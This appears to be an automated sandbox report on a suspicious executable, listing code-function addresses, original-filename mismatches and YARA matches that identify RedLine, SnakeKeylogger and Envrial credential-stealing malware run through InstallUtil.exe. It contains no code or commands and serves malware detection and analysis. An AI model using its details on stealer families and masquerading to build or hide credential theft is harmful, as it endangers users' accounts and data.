Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E0498 2_2_062E0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E6490 2_2_062E6490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E68E8 2_2_062E68E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EC0E8 2_2_062EC0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EC0F8 2_2_062EC0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E08F0 2_2_062E08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EA0C0 2_2_062EA0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E08DF 2_2_062E08DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E68D8 2_2_062E68D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EA0D0 2_2_062EA0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EE120 2_2_062EE120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E0D39 2_2_062E0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E3D10 2_2_062E3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EE111 2_2_062EE111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EA568 2_2_062EA568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E0D48 2_2_062E0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EA558 2_2_062EA558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EE5A8 2_2_062EE5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E11A0 2_2_062E11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EC581 2_2_062EC581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EC590 2_2_062EC590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E1190 2_2_062E1190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E15E9 2_2_062E15E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062E15F8 2_2_062E15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_062EA9F0 2_2_062EA9F0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_00A79458 4_2_00A79458
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_00A759E0 4_2_00A759E0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_00A759D0 4_2_00A759D0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_00A75F60 4_2_00A75F60
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_00A75F70 4_2_00A75F70
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05783020 4_2_05783020
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0578314E 4_2_0578314E
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_057924C0 4_2_057924C0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05792790 4_2_05792790
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05792780 4_2_05792780
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579DEC8 4_2_0579DEC8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579DEBB 4_2_0579DEBB
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05790698 4_2_05790698
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05790687 4_2_05790687
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579D078 4_2_0579D078
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579D068 4_2_0579D068
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579A058 4_2_0579A058
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579A048 4_2_0579A048
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_0579B8B1 4_2_0579B8B1
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05793B28 4_2_05793B28
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05793B1B 4_2_05793B1B
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_057A0040 4_2_057A0040
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_057A0023 4_2_057A0023
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058EAD88 4_2_058EAD88
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058EE620 4_2_058EE620
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E68B0 4_2_058E68B0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E68D0 4_2_058E68D0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E0006 4_2_058E0006
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058EC428 4_2_058EC428
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E0040 4_2_058E0040
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E6B00 4_2_058E6B00
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E67D8 4_2_058E67D8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E6B00 4_2_058E6B00
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E8F00 4_2_058E8F00
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E8F10 4_2_058E8F10
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E96CB 4_2_058E96CB
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E6AF0 4_2_058E6AF0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E7A10 4_2_058E7A10
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_058E7A20 4_2_058E7A20
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059AC5D8 4_2_059AC5D8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059BDD00 4_2_059BDD00
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B78F0 4_2_059B78F0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B0B3C 4_2_059B0B3C
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B0007 4_2_059B0007
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059BE027 4_2_059BE027
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B0040 4_2_059B0040
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B6368 4_2_059B6368
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059BF2F8 4_2_059BF2F8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B78E0 4_2_059B78E0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059BA870 4_2_059BA870
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059B9B28 4_2_059B9B28
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059CB978 4_2_059CB978
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059CB968 4_2_059CB968
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_059CBB1F 4_2_059CBB1F
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB9238 4_2_05AB9238
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB1630 4_2_05AB1630
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB4650 4_2_05AB4650
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB3568 4_2_05AB3568
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB3578 4_2_05AB3578
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB6BE1 4_2_05AB6BE1
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB6BF0 4_2_05AB6BF0
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB9228 4_2_05AB9228
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05AB4640 4_2_05AB4640
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05C60040 4_2_05C60040
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4_2_05C60007 4_2_05C60007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022ED20C 5_2_022ED20C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022ED7B8 5_2_022ED7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022ED4EB 5_2_022ED4EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022E74E0 5_2_022E74E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EC4E0 5_2_022EC4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EA598 5_2_022EA598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022E586F 5_2_022E586F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EC980 5_2_022EC980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022E6EB6 5_2_022E6EB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EEEE0 5_2_022EEEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022E2EF8 5_2_022E2EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022ECF30 5_2_022ECF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022ECC58 5_2_022ECC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022E4311 5_2_022E4311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EC6A8 5_2_022EC6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_022EEED0 5_2_022EEED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F55168 5_2_05F55168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F59D68 5_2_05F59D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F51860 5_2_05F51860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F51FB8 5_2_05F51FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5DF50 5_2_05F5DF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F52AA8 5_2_05F52AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F59698 5_2_05F59698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5CDF0 5_2_05F5CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5CDE0 5_2_05F5CDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F960 5_2_05F5F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F951 5_2_05F5F951
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F55159 5_2_05F55159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F508 5_2_05F5F508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F4F7 5_2_05F5F4F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F58CE0 5_2_05F58CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F58CD0 5_2_05F58CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F0B0 5_2_05F5F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5F0A0 5_2_05F5F0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F59478 5_2_05F59478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F51850 5_2_05F51850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5EC58 5_2_05F5EC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F50040 5_2_05F50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5EC49 5_2_05F5EC49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F50033 5_2_05F50033
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5E800 5_2_05F5E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5E7F0 5_2_05F5E7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5E3A8 5_2_05F5E3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F51FA8 5_2_05F51FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5E399 5_2_05F5E399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F50B30 5_2_05F50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5DF3F 5_2_05F5DF3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F50B20 5_2_05F50B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5DAF8 5_2_05F5DAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5DAE8 5_2_05F5DAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5D6A0 5_2_05F5D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5D690 5_2_05F5D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F52A9B 5_2_05F52A9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5D248 5_2_05F5D248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05F5D238 5_2_05F5D238
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 0040E1D8 appears 44 times
Sample file is different than original file name gathered from version info
Source: SKM_72059114803.exe, 00000000.00000002.1070637470.0000000003988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1060739593.0000000002941000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1074573465.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1074382230.0000000005E60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1071675746.0000000005620000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameUksmwp.dll" vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1070637470.00000000039E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1059627519.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SKM_72059114803.exe
Source: SKM_72059114803.exe, 00000000.00000002.1060739593.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs SKM_72059114803.exe
Uses 32bit PE files
Source: SKM_72059114803.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.InnerException.exe.3662d20.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.SKM_72059114803.exe.3a50c30.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.221fece.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.InstallUtil.exe.5980000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2310f20.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2310000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2310f20.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2220dee.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
